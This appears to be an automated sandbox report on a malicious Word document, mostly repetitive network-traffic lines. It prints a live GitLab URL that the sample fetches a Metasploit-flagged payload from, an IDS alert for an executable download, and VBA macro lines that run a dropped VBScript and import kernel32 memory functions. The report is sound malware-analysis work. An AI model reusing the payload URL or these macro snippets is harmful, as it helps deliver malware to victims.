Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 172.65.251.78:443 -> 192.168.2.4:49742
Source: global trafficTCP traffic: 192.168.2.4:49742 -> 172.65.251.78:443

Networking

barindex
Source: Network trafficSuricata IDS: 2022640 - Severity 1 - ET MALWARE PE EXE or DLL Windows file download Text M2 : 172.65.251.78:443 -> 192.168.2.4:49742
Source: C:\Windows\SysWOW64\wscript.exeNetwork Connect: 172.65.251.78 443Jump to behavior
Source: global trafficTCP traffic: 192.168.2.4:62872 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.4:55352 -> 1.1.1.1:53
Source: Joe Sandbox ViewIP Address: 172.65.251.78 172.65.251.78
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: global trafficHTTP traffic detected: GET /app8490744/updatesa/-/raw/main/up HTTP/1.1Accept: */*Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gitlab.comConnection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /app8490744/updatesa/-/raw/main/up HTTP/1.1Accept: */*Accept-Language: en-chAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: gitlab.comConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: gitlab.com
Source: wscript.exe, WindowServices.vbs.0.drString found in binary or memory: https://gitlab.com/app8490744/updatesa/-/raw/main/up
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownHTTPS traffic detected: 172.65.251.78:443 -> 192.168.2.4:49742 version: TLS 1.2

System Summary

barindex
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\up[1].txt, type: DROPPEDMatched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 5UnAIdF7m2.docxOLE, VBA macro line: shell.Run """" & vbsFilePath & """", 1, True
Source: 5UnAIdF7m2.docxOLE, VBA macro line: Private Declare PtrSafe Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (lpvDest As Any, lpvSource As Any, ByVal cbCopy As LongPtr)
Source: 5UnAIdF7m2.docxOLE, VBA macro line: Private Declare Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (lpvDest As Any, lpvSource As Any, ByVal cbCopy As LongPtr)
Source: 5UnAIdF7m2.docxOLE, VBA macro line: Private Declare PtrSafe Function WideCharToMultiByte Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpDefaultChar As LongPtr, ByVal lpUsedDefaultChar As LongPtr) As Long
Source: 5UnAIdF7m2.docxOLE, VBA macro line: Private Declare PtrSafe Function MultiByteToWideChar Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long) As Long
Source: 5UnAIdF7m2.docxOLE, VBA macro line: Private Declare PtrSafe Function FormatMessage Lib "kernel32" Alias "FormatMessageA" (ByVal dwFlags As Long, ByVal lpSource As LongPtr, ByVal dwMessageId As Long, ByVal dwLanguageId As Long, ByVal lpBuffer As String, ByVal nSize As Long, ByVal Args As LongPtr) As Long
Source: 5UnAIdF7m2.docxOLE, VBA macro line: Private Declare Function WideCharToMultiByte Lib "kernel32" (ByVal CodePage As Long, ByVal dwFlags As Long, ByVal lpWideCharStr As LongPtr, ByVal cchWideChar As Long, lpMultiByteStr As Any, ByVal cchMultiByte As Long, ByVal lpDefaultChar As LongPtr, ByVal lpUsedDefaultChar As LongPtr) As Long
